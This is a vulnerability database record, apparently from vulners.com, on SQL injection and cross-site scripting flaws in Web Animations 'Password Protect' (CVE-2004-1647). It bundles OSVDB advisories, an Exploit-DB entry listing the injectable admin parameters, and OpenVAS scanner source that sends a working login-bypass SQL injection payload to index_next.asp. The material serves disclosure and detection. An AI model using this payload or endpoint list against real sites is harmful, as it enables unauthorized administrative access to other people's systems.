ID OSVDB:9372 Type osvdb Reporter Criolabs Staff(security@criolabs.net) Modified 2004-08-30T18:26:26
Description
Vulnerability Description
Password Protect contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the "admin" and "Pass" variables in the "index_next.asp" module is not verified properly and will allow an attacker to inject or manipulate SQL queries.
Solution Description
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
Short Description
Password Protect contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the "admin" and "Pass" variables in the "index_next.asp" module is not verified properly and will allow an attacker to inject or manipulate SQL queries.
{"title": "Password Protect index_next.asp Multiple Variable SQL Injection", "published": "2004-08-30T18:26:26", "references": [], "type": "osvdb", "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2017-04-28T13:20:04", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-1647"]}, {"type": "osvdb", "idList": ["OSVDB:9370", "OSVDB:9377", "OSVDB:9375"]}, {"type": "exploitdb", "idList": ["EDB-ID:24420"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231014587"]}], "modified": "2017-04-28T13:20:04", "rev": 2}, "vulnersScore": 7.7}, "cvelist": ["CVE-2004-1647"], "viewCount": 4, "affectedSoftware": [{"version": "1.0", "name": "Password Protect", "operator": "eq"}], "id": "OSVDB:9372", "modified": "2004-08-30T18:26:26", "href": "https://vulners.com/osvdb/OSVDB:9372", "edition": 1, "description": "## Vulnerability Description\nPassword Protect contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the \"admin\" and \"Pass\" variables in the \"index_next.asp\" module is not verified properly and will allow an attacker to inject or manipulate SQL queries.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPassword Protect contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the \"admin\" and \"Pass\" variables in the \"index_next.asp\" module is not verified properly and will allow an attacker to inject or manipulate SQL queries.\n## Manual Testing Notes\nhttp://[victim]/adminSection/index_next.asp?admin = (SQLInjection) Pass = (SQLInjection)\n## References:\nVendor URL: http://www.webanimations.com.au/\nVendor URL: http://www.webanimations.com.au/shop/Scripts/prodView.asp?idproduct=16\nSecurity Tracker: 1011093\n[Secunia Advisory ID:12407](https://secuniaresearch.flexerasoftware.com/advisories/12407/)\n[Related OSVDB ID: 9371](https://vulners.com/osvdb/OSVDB:9371)\n[Related OSVDB ID: 9373](https://vulners.com/osvdb/OSVDB:9373)\n[Related OSVDB ID: 9369](https://vulners.com/osvdb/OSVDB:9369)\n[Related OSVDB ID: 9374](https://vulners.com/osvdb/OSVDB:9374)\n[Related OSVDB ID: 9375](https://vulners.com/osvdb/OSVDB:9375)\n[Related OSVDB ID: 9370](https://vulners.com/osvdb/OSVDB:9370)\n[Related OSVDB ID: 9376](https://vulners.com/osvdb/OSVDB:9376)\n[Related OSVDB ID: 9377](https://vulners.com/osvdb/OSVDB:9377)\nOther Advisory URL: http://www.criolabs.net/advisories/passprotect.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0017.html\n[CVE-2004-1647](https://vulners.com/cve/CVE-2004-1647)\n", "bulletinFamily": "software", "reporter": "Criolabs Staff(security@criolabs.net)", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "lastseen": "2017-04-28T13:20:04"}
{"cve": [{"lastseen": "2021-02-02T05:23:00", "description": "SQL injection vulnerability in Password Protect allows remote attackers to execute arbitrary SQL statements and bypass authentication via (1) admin or Pass parameter to index_next.asp, (2) LoginId, OPass, or NPass to CPassChangePassword.asp, (3) users_edit.asp, or (4) users_add.asp.", "edition": 4, "cvss3": {}, "published": "2004-08-30T04:00:00", "title": "CVE-2004-1647", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-1647"], "modified": "2017-07-11T01:31:00", "cpe": ["cpe:/a:web_animations:password_protect:*"], "id": "CVE-2004-1647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:web_animations:password_protect:*:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:04", "bulletinFamily": "software", "cvelist": ["CVE-2004-1647"], "edition": 1, "description": "## Vulnerability Description\nPassword Protect contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the variables \"LoginId\", \"OPass\",\n\"NPass\" and \"CPass\" in the \"ChangePassword.asp\" module are not verified properly and will allow an attacker to inject or manipulate SQL queries.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPassword Protect contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the variables \"LoginId\", \"OPass\",\n\"NPass\" and \"CPass\" in the \"ChangePassword.asp\" module are not verified properly and will allow an attacker to inject or manipulate SQL queries.\n## References:\nVendor URL: http://www.webanimations.com.au/\nVendor URL: http://www.webanimations.com.au/shop/Scripts/prodView.asp?idproduct=16\nSecurity Tracker: 1011093\n[Secunia Advisory ID:12407](https://secuniaresearch.flexerasoftware.com/advisories/12407/)\n[Related OSVDB ID: 9371](https://vulners.com/osvdb/OSVDB:9371)\n[Related OSVDB ID: 9373](https://vulners.com/osvdb/OSVDB:9373)\n[Related OSVDB ID: 9369](https://vulners.com/osvdb/OSVDB:9369)\n[Related OSVDB ID: 9374](https://vulners.com/osvdb/OSVDB:9374)\n[Related OSVDB ID: 9375](https://vulners.com/osvdb/OSVDB:9375)\n[Related OSVDB ID: 9372](https://vulners.com/osvdb/OSVDB:9372)\n[Related OSVDB ID: 9376](https://vulners.com/osvdb/OSVDB:9376)\n[Related OSVDB ID: 9377](https://vulners.com/osvdb/OSVDB:9377)\nOther Advisory URL: http://www.criolabs.net/advisories/passprotect.txt\n[Nessus Plugin ID:14587](https://vulners.com/search?query=pluginID:14587)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0017.html\n[CVE-2004-1647](https://vulners.com/cve/CVE-2004-1647)\nBugtraq ID: 11073\n", "modified": "2004-08-30T18:26:26", "published": "2004-08-30T18:26:26", "id": "OSVDB:9370", "href": "https://vulners.com/osvdb/OSVDB:9370", "title": "Password Protect ChangePassword.asp Multiple Variables SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:04", "bulletinFamily": "software", "cvelist": ["CVE-2004-1647"], "edition": 1, "description": "## Vulnerability Description\nPassword Protect contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that user input supplied to the users_add.asp script which will allow an attacker to inject or manipulate SQL queries.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPassword Protect contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that user input supplied to the users_add.asp script which will allow an attacker to inject or manipulate SQL queries.\n## References:\nVendor URL: http://www.webanimations.com.au/\nVendor URL: http://www.webanimations.com.au/shop/Scripts/prodView.asp?idproduct=16\nSecurity Tracker: 1011093\n[Secunia Advisory ID:12407](https://secuniaresearch.flexerasoftware.com/advisories/12407/)\n[Related OSVDB ID: 9371](https://vulners.com/osvdb/OSVDB:9371)\n[Related OSVDB ID: 9373](https://vulners.com/osvdb/OSVDB:9373)\n[Related OSVDB ID: 9369](https://vulners.com/osvdb/OSVDB:9369)\n[Related OSVDB ID: 9374](https://vulners.com/osvdb/OSVDB:9374)\n[Related OSVDB ID: 9370](https://vulners.com/osvdb/OSVDB:9370)\n[Related OSVDB ID: 9372](https://vulners.com/osvdb/OSVDB:9372)\n[Related OSVDB ID: 9376](https://vulners.com/osvdb/OSVDB:9376)\n[Related OSVDB ID: 9377](https://vulners.com/osvdb/OSVDB:9377)\nOther Advisory URL: http://www.criolabs.net/advisories/passprotect.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0017.html\n[CVE-2004-1647](https://vulners.com/cve/CVE-2004-1647)\n", "modified": "2004-08-30T18:26:26", "published": "2004-08-30T18:26:26", "href": "https://vulners.com/osvdb/OSVDB:9375", "id": "OSVDB:9375", "title": "Password Protect users_add.asp SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:04", "bulletinFamily": "software", "cvelist": ["CVE-2004-1647"], "edition": 1, "description": "## Vulnerability Description\nPassword Protect contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is due to the users_edit.asp script insufficiently validating the user input. This flaw will allow an attacker to inject or manipulate SQL queries.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPassword Protect contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is due to the users_edit.asp script insufficiently validating the user input. This flaw will allow an attacker to inject or manipulate SQL queries.\n## References:\nVendor URL: http://www.webanimations.com.au/\nVendor URL: http://www.webanimations.com.au/shop/Scripts/prodView.asp?idproduct=16\nSecurity Tracker: 1011093\n[Secunia Advisory ID:12407](https://secuniaresearch.flexerasoftware.com/advisories/12407/)\n[Related OSVDB ID: 9371](https://vulners.com/osvdb/OSVDB:9371)\n[Related OSVDB ID: 9373](https://vulners.com/osvdb/OSVDB:9373)\n[Related OSVDB ID: 9369](https://vulners.com/osvdb/OSVDB:9369)\n[Related OSVDB ID: 9374](https://vulners.com/osvdb/OSVDB:9374)\n[Related OSVDB ID: 9375](https://vulners.com/osvdb/OSVDB:9375)\n[Related OSVDB ID: 9370](https://vulners.com/osvdb/OSVDB:9370)\n[Related OSVDB ID: 9372](https://vulners.com/osvdb/OSVDB:9372)\n[Related OSVDB ID: 9376](https://vulners.com/osvdb/OSVDB:9376)\nOther Advisory URL: http://www.criolabs.net/advisories/passprotect.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0017.html\n[CVE-2004-1647](https://vulners.com/cve/CVE-2004-1647)\n", "modified": "2004-08-30T18:26:26", "published": "2004-08-30T18:26:26", "href": "https://vulners.com/osvdb/OSVDB:9377", "id": "OSVDB:9377", "title": "Password Protect users_edit.asp SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T23:17:04", "description": "Web Animations Password Protect Multiple Input Validation Vulnerabilities. CVE-2004-1647 . Webapps exploit for asp platform", "published": "2004-08-31T00:00:00", "type": "exploitdb", "title": "Web Animations Password Protect Multiple Input Validation Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1647"], "modified": "2004-08-31T00:00:00", "id": "EDB-ID:24420", "href": "https://www.exploit-db.com/exploits/24420/", "sourceData": "source: http://www.securityfocus.com/bid/11073/info\r\n\r\nPassword Protect is reported prone to a multiple cross-site scripting and SQL injection vulnerabilities. These issues occur due to insufficient sanitization of user-supplied input. Successful exploitation of these issues may result in arbitrary HTML and script code execution and/or compromise of the underlying database.\r\n\r\nIt is reported that these issues could be exploited to gain unauthorized administrative access to the application.\r\n\r\nAll versions of Password Protect are considered vulnerable to these issues. \r\n\r\nSQL injection\r\n\r\n/adminSection/index_next.asp?admin = (SQLInjection) Pass = (SQLInjection)\r\n\r\n/adminSection/ChangePassword.asp?LoginId=(SQLInjection) OPass=(SQLInjection) NPass=(SQLInjection) CPass=(SQLInjection)\r\n\r\nCross-site scripting:\r\n/adminSection/index.asp?ShowMsg=(XSS)\r\n/adminSection/ChangePassword.asp?ShowMsg=(XSS)\r\n/adminSection/users_list.asp?ShowMsg=(XSS)\r\n/adminSection/users_add.asp?ShowMsg=(XSS) ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24420/"}], "openvas": [{"lastseen": "2020-05-08T16:40:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1647", "CVE-2004-1648"], "description": "Password Protect is a password protected script allowing you to manage a\n remote site through an ASP based interface.", "modified": "2020-05-06T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231014587", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231014587", "type": "openvas", "title": "Password Protect SQL Injection", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Password Protect SQL Injection\n#\n# Authors:\n# Noam Rathaus\n#\n# Copyright:\n# Copyright (C) 2004 Noam Rathaus\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n# Contact: Criolabs <security@criolabs.net>\n# Subject: Password Protect XSS and SQL-Injection vulnerabilities.\n# Date: 31.8.2004 02:17\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.14587\");\n script_version(\"2020-05-06T07:10:15+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_cve_id(\"CVE-2004-1647\", \"CVE-2004-1648\");\n script_bugtraq_id(11073);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Password Protect SQL Injection\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2004 Noam Rathaus\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the latest version of this software.\");\n\n script_tag(name:\"summary\", value:\"Password Protect is a password protected script allowing you to manage a\n remote site through an ASP based interface.\");\n\n script_tag(name:\"impact\", value:\"An SQL Injection vulnerability in the product allows remote attackers to\n inject arbitrary SQL statements into the remote database and to gain\n administrative access on this service.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\nif( ! http_can_host_asp( port:port ) )\n exit( 0 );\n\nhost = http_host_name( port:port );\n\nforeach dir( make_list_unique( \"/\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n\n url = dir + \"/adminSection/main.asp\";\n req = http_get( item:url, port:port );\n res = http_keepalive_send_recv( port:port, data:req );\n\n v = eregmatch( pattern: \"Set-Cookie: *([^; \\t\\r\\n]+)\", string:res );\n if( isnull( v ) ) continue; # Cookie is not available\n cookie = v[1];\n\n useragent = http_get_user_agent();\n req = string( \"POST /\", dir, \"/adminSection/index_next.asp HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Accept: */*\\r\\n\",\n \"Connection: close\\r\\n\",\n \"Cookie: \", cookie, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: 57\\r\\n\",\n \"\\r\\n\",\n \"admin=%27+or+%27%27%3D%27&Pass=password&BTNSUBMIT=+Login+\\r\\n\" );\n res = http_keepalive_send_recv( port:port, data:req );\n\n req = string( \"GET /\", dir, \"/adminSection/main.asp HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Accept: */*\\r\\n\",\n \"Connection: close\\r\\n\",\n \"Cookie: \", cookie, \"\\r\\n\",\n \"\\r\\n\" );\n res = http_keepalive_send_recv( port:port, data:req );\n\n if( \"Web Site Administration\" >< res && \"The Web Animations Administration Section\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
